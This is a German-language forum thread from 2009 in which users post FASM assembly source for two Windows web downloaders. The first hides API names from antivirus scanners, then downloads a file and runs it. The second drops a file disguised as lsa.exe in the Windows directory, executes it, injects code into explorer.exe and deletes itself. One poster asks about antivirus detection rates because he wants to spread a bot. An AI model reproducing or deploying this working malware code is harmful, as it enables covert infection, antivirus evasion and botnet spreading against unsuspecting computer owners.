
[Fasm]Web Downloader



$_staX
11.06.2009, 12:19
Simpler Webdownloader,
keine Ahnung für was man ihn brauchen kann, aber mir war langweilig.


include '%include%/WIN32AX.inc'
.data
; download source and drop location. "url" is a placeholder string as posted;
; the drop path is hard-coded, so C:\test.exe is the on-disk artifact this
; sample leaves behind
url db "url",0
ziel db "C:\test.exe",0

; reserve a few bytes: the DLL and API name strings are assembled here at
; runtime (the reserved bytes are expected to load as zero, which supplies
; the NUL terminators at offsets 10 and 18)
urlmon rd 10                            ; 40 bytes: receives "URLMON.DLL"
Down rd 18                              ; 72 bytes: receives "URLDownloadToFileA"
dllhandle rd 1                          ; HMODULE returned by LoadLibraryA
DownloadFile rd 1                       ; function pointer returned by GetProcAddress

.code
;-----------------------------------------------------------------------
; main: download a file to a fixed path and launch it.
; Flow: build "URLMON.DLL" / "URLDownloadToFileA" in memory -> LoadLibraryA
;       -> GetProcAddress -> URLDownloadToFileA -> ShellExecuteA -> ExitProcess.
; No return value is checked anywhere: the library handle, the resolved
; address and the download HRESULT are all taken as-is, and ShellExecuteA is
; issued on the drop path regardless of whether the download succeeded.
; Observable artifacts: a process loading urlmon.dll dynamically, a file
; written to C:\test.exe, and a child process started from that path.
;-----------------------------------------------------------------------
main:
; assemble "URLMON.DLL" at runtime so the name is not a contiguous string in
; the file (author's note: because of AVs). After the four stores bytes 0..9
; read U R L M O N . D L L; the 'RL' word store overwrites the '3S' filler
; left at offsets 1..2 by the first dword store.
mov dword [urlmon], 'U3SM'
mov dword [urlmon+4d], 'ON.D'
mov word [urlmon+1d], 'RL'
mov word [urlmon+8d], 'LL'
; load urlmon.dll; eax is stored as the module handle without a NULL check
push urlmon
call [LoadLibraryA]
mov [dllhandle],eax
; assemble "URLDownloadToFileA" (18 bytes) the same way: the 'RL' word at +1
; and the 'a' byte at +9 patch the 'bc' and 'R' fillers of the dword stores
mov dword [Down], 'UbcD'
mov dword [Down+4d], 'ownl'
mov dword [Down+8d], 'oRdT'
mov word [Down+1d], 'RL'
mov dword [Down+12d], 'oFil'
mov word [Down+16d], 'eA'
mov byte [Down+9d], 'a'
; resolve the API address; a NULL result would be stored and called below anyway
push Down
push [dllhandle]
call [GetProcAddress]
mov [DownloadFile],eax
; download: URLDownloadToFileA(NULL, url, ziel, 0, NULL); the HRESULT in eax is ignored
push 0
push 0
push ziel
push url
push 0
call [DownloadFile]
; launch the dropped file:
; ShellExecuteA(HWND_DESKTOP, NULL, ziel, NULL, NULL, SW_SHOWNORMAL)
; whatever currently sits at the drop path is started, downloaded or not
push SW_SHOWNORMAL
push NULL
push NULL
push ziel
push NULL
push HWND_DESKTOP
call [ShellExecuteA]

push 0
call [ExitProcess]

.end main

dr0p
11.06.2009, 12:30
Hab hier auch noch einen, wie siehts mit der Detection Rate von deinem aus? eventuell was gutes für mich zum Bot spreaden wenn er Fud ist.




; Small selfdeleting downloader
; by DiA/RRLF (c)06
; www.vx-dia.de.vu
;
; Single-section image. The tail (RemoteThreadStart .. RemoteThreadEnd) is
; copied into another process and executed there, so code in that range
; cannot use the normal import table and calls through the _invoke macro.

include "%fasminc%\win32ax.inc"

; _invoke proc, args...
; stdcall-style call for the relocated stub: pushes the arguments right to
; left (the 'reverse' block) and calls through the pointer stored at
; [ebp + proc]. The stub sets ebp to its load delta first, so 'proc' is the
; link-time label of a dword that holds the real target address.
macro _invoke proc,[arg]
{ common
if ~ arg eq
reverse
pushd arg
common
end if
call [ebp + proc] }

entry DowloadFile                       ; entry point (the 'Dowload' spelling is used consistently)

; code and data share one section flagged readable/writeable/executable; a
; single RWX section like this is itself a distinguishing PE characteristic
section '.code' code readable writeable executable

URL db "http://url.com/here.exe", 0 ;the executable to download (placeholder as posted)
SaveAs db "\lsa.exe", 0 ;file name appended to the Windows directory by lstrcat

InetHandle dd ?                         ; HINTERNET from InternetOpen
UrlHandle dd ?                          ; HINTERNET from InternetOpenUrl
FileHandle dd ?                         ; HANDLE from CreateFile
ReadNext dd ?                           ; bytes returned by the last InternetReadFile; 0 ends the loop
DownloadBuffer rb 1024d                 ; one read chunk
BytesWritten dd ?                       ; WriteFile out-parameter, never examined
WindowsDir rb 256d                      ; becomes the full target path (Windows dir + SaveAs)
ProcessEntryOwn PROCESSENTRY32          ; Toolhelp entry used while scanning for explorer.exe
SnapHandleOwn dd ?                      ; HANDLE from CreateToolhelp32Snapshot
ProcessHandle dd ?                      ; explorer.exe handle from OpenProcess
BaseAddress dd ?                        ; remote allocation that receives the stub
StartupInfo STARTUPINFO                 ; passed to CreateProcess with no field set (cb included)
ProcessInfo PROCESS_INFORMATION         ; CreateProcess out-parameter, never examined

;-----------------------------------------------------------------------
; DowloadFile (entry point)
; 1. Download URL into %WINDIR%\lsa.exe via WinINet (InternetOpen /
;    InternetOpenUrl / InternetReadFile -> WriteFile, 1024-byte chunks until
;    a 0-byte read).
; 2. CreateProcess on the dropped file (new console).
; 3. Fall through into DownloadFileError: resolve DeleteFileA, locate
;    explorer.exe with Toolhelp32, copy the RemoteThreadStart..RemoteThreadEnd
;    blob into it (VirtualAllocEx / WriteProcessMemory), start it with
;    CreateRemoteThread, then ExitProcess. The remote stub deletes this
;    executable once the process is gone.
; Every API failure is tested as eax == 0 and jumps to DownloadFileError or
; Exit; handles opened before such a jump are not closed.
;-----------------------------------------------------------------------
DowloadFile:
; WindowsDir = GetWindowsDirectoryA() + SaveAs, e.g. <windows dir>\lsa.exe
invoke GetWindowsDirectory,\
WindowsDir,\
256d

invoke lstrcat,\
WindowsDir,\
SaveAs

; InternetOpenA(lpszAgent, ...): the URL string is passed as the agent
; parameter, so the download URL itself is what this client identifies as
; (a conspicuous User-Agent on the wire)
invoke InternetOpen,\
URL,\
0,\
0,\
0,\
0

cmp eax, 0                              ; NULL handle -> skip the download
je DownloadFileError

mov dword [InetHandle], eax

; InternetOpenUrlA(hInternet, URL, no headers, no flags, no context)
invoke InternetOpenUrl,\
dword [InetHandle],\
URL,\
0,\
0,\
0,\
0

cmp eax, 0
je DownloadFileError

mov dword [UrlHandle], eax

; CreateFileA(WindowsDir, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_NEW,
; FILE_ATTRIBUTE_NORMAL, NULL): CREATE_NEW refuses to overwrite an existing
; file; failure is tested as eax == 0
invoke CreateFile,\
WindowsDir,\
GENERIC_WRITE,\
FILE_SHARE_WRITE,\
0,\
CREATE_NEW,\
FILE_ATTRIBUTE_NORMAL,\
0

cmp eax, 0
je DownloadFileError

mov dword [FileHandle], eax

; ReadNext doubles as the loop condition; make it non-zero so the first
; pass runs (InternetReadFile overwrites it on every iteration)
inc dword [ReadNext]

; read up to 1024 bytes, write exactly ReadNext bytes, stop on a 0-byte read;
; the InternetReadFile / WriteFile results themselves are not checked
ReadNextBytes:
cmp dword [ReadNext], 0
je DownloadComplete

invoke InternetReadFile,\
dword [UrlHandle],\
DownloadBuffer,\
1024d,\
ReadNext

invoke WriteFile,\
dword [FileHandle],\
DownloadBuffer,\
dword [ReadNext],\
BytesWritten,\
0

jmp ReadNextBytes

; download finished: close the file and both WinINet handles, then run it
DownloadComplete:
invoke CloseHandle,\
dword [FileHandle]

invoke InternetCloseHandle,\
dword [UrlHandle]

invoke InternetCloseHandle,\
dword [InetHandle]

; CreateProcessA(WindowsDir, ...) with CREATE_NEW_CONSOLE; StartupInfo goes
; in with no field set (cb included) and the result is not checked.
; Execution falls through into the self-delete path below.
invoke CreateProcess,\
WindowsDir,\
0,\
0,\
0,\
0,\
CREATE_NEW_CONSOLE,\
0,\
0,\
StartupInfo,\
ProcessInfo

; self-delete path, reached on error and (by fall-through) on success.
; Writes this executable's own path into OwnFilename, which lies inside the
; blob that is copied into explorer.exe further down.
DownloadFileError:
invoke GetModuleFileName,\
0,\
OwnFilename,\
256

; resolve DeleteFileA at runtime and store it in the blob so the relocated
; stub can call it through [ebp + _DeleteFile]
invoke LoadLibrary,\
"kernel32.dll"

cmp eax, 0
je Exit

invoke GetProcAddress,\
eax,\
"DeleteFileA"
mov dword [_DeleteFile], eax

; Toolhelp32 process walk (flag 2 = TH32CS_SNAPPROCESS) looking for explorer.exe
mov dword [ProcessEntryOwn.dwSize], sizeof.PROCESSENTRY32

invoke CreateToolhelp32Snapshot,\
2,\
0

cmp eax, 0
je Exit

mov dword [SnapHandleOwn], eax

invoke Process32First,\
dword [SnapHandleOwn],\
ProcessEntryOwn

; eax == 0 here means Process32First/Next ran out of entries -> give up
; (the snapshot handle is not closed on this path)
NextTargetProcess:
cmp eax, 0
je Exit

; case-insensitive compare of the entry's exe name against "explorer.exe"
invoke lstrcmpi,\
ProcessEntryOwn.szExeFile,\
"explorer.exe"

cmp eax, 0
je FoundExplorer

invoke Process32Next,\
dword [SnapHandleOwn],\
ProcessEntryOwn

jmp NextTargetProcess

; classic cross-process injection into explorer.exe:
; OpenProcess(VM_OPERATION | VM_WRITE | CREATE_THREAD) -> VirtualAllocEx ->
; WriteProcessMemory -> CreateRemoteThread. This API sequence aimed at
; explorer.exe is exactly what process-access and remote-thread telemetry
; is meant to surface.
FoundExplorer:
invoke CloseHandle,\
dword [SnapHandleOwn]

invoke OpenProcess,\
PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,\
0,\
dword [ProcessEntryOwn.th32ProcessID]

cmp eax, 0
je Exit

mov dword [ProcessHandle], eax

; allocate (RemoteThreadEnd - RemoteThreadStart) bytes in the target
invoke VirtualAllocEx,\
dword [ProcessHandle],\
0,\
RemoteThreadEnd - RemoteThreadStart,\
MEM_COMMIT,\
PAGE_READWRITE

cmp eax, 0
je Exit

mov dword [BaseAddress], eax

; copy stub code plus its data (OwnFilename, _DeleteFile) into the allocation
invoke WriteProcessMemory,\
dword [ProcessHandle],\
dword [BaseAddress],\
RemoteThreadStart,\
RemoteThreadEnd - RemoteThreadStart,\
0

cmp eax, 0
je Exit

; start the stub at the remote base address; the returned thread handle is
; neither checked nor closed
invoke CreateRemoteThread,\
dword [ProcessHandle],\
0,\
0,\
dword [BaseAddress],\
0,\
0,\
0

invoke CloseHandle,\
dword [ProcessHandle]

; this process ends here; its image file becomes deletable once it has exited
Exit:
invoke ExitProcess,\
0

;-----------------------------------------------------------------------
; Position-independent stub copied into explorer.exe
; (RemoteThreadStart .. RemoteThreadEnd) and used as the remote thread's
; start routine.
; ebp = load delta (remote address - link-time address), obtained with the
; call/pop trick, so [ebp + label] reaches the copied data.
; Loop: DeleteFileA(OwnFilename) until it returns non-zero, i.e. the thread
; busy-spins inside explorer.exe until the downloader's image file can be
; removed (a running image cannot be deleted), then returns, ending the
; thread. The spin is an unbounded CPU loop in explorer.exe if deletion never
; succeeds.
;-----------------------------------------------------------------------
RemoteThreadStart:
call DeltaOffset                        ; pushes the remote address of DeltaOffset

DeltaOffset:
pop ebp                                 ; ebp = remote address of DeltaOffset
sub ebp, DeltaOffset                    ; ebp = remote - link-time = load delta

DeleteLoop:
lea eax, dword [ebp + OwnFilename]      ; eax = remote address of the path string

; DeleteFileA(eax) through the pointer the launcher stored in _DeleteFile
_invoke _DeleteFile,\
eax

cmp eax, 0                              ; FALSE -> file still in use, retry
je DeleteLoop

ReturnThread:
ret

; data carried along with the stub; both fields are filled in by the
; launcher (GetModuleFileName / GetProcAddress) before the blob is copied
RemoteDatas:
OwnFilename rb 256d                     ; full path of the downloader executable
_DeleteFile dd ?                        ; address of kernel32!DeleteFileA
RemoteThreadEnd:

; import table: only kernel32 and wininet are linked here. DeleteFileA is
; absent on purpose - it is resolved at runtime in DownloadFileError and
; stored in the blob, because the relocated stub cannot use this table.
section '.idata' import data readable writeable
library kernel, "kernel32.dll",\
wininet, "wininet.dll"

; kernel32: file I/O, module/API lookup, Toolhelp32 walk, process creation
; and the cross-process (VirtualAllocEx / WriteProcessMemory /
; CreateRemoteThread) set used for injection
import kernel,\
WriteFile, "WriteFile",\
CreateFile, "CreateFileA",\
CloseHandle, "CloseHandle",\
lstrcat, "lstrcatA",\
GetWindowsDirectory, "GetWindowsDirectoryA",\
GetModuleFileName, "GetModuleFileNameA",\
LoadLibrary, "LoadLibraryA",\
GetProcAddress, "GetProcAddress",\
CreateToolhelp32Snapshot, "CreateToolhelp32Snapshot",\
Process32First, "Process32First",\
Process32Next, "Process32Next",\
lstrcmpi, "lstrcmpiA",\
CreateProcess, "CreateProcessA",\
OpenProcess, "OpenProcess",\
VirtualAllocEx, "VirtualAllocEx",\
WriteProcessMemory, "WriteProcessMemory",\
CreateRemoteThread, "CreateRemoteThread",\
ExitProcess, "ExitProcess"

; wininet: the four calls that make up the download loop
import wininet,\
InternetOpen, "InternetOpenA",\
InternetOpenUrl, "InternetOpenUrlA",\
InternetReadFile, "InternetReadFile",\
InternetCloseHandle, "InternetCloseHandle"

l0dsb
11.06.2009, 13:29
Wieso benutzt ihr Assembler für solche Dinge, ohne irgendeine Notwendigkeit, die Sprache zu verwenden?

$_staX
11.06.2009, 16:46
Wieso benutzt ihr Assembler für solche Dinge, ohne irgendeine Notwendigkeit, die Sprache zu verwenden?

Weil mir langweilig war ;)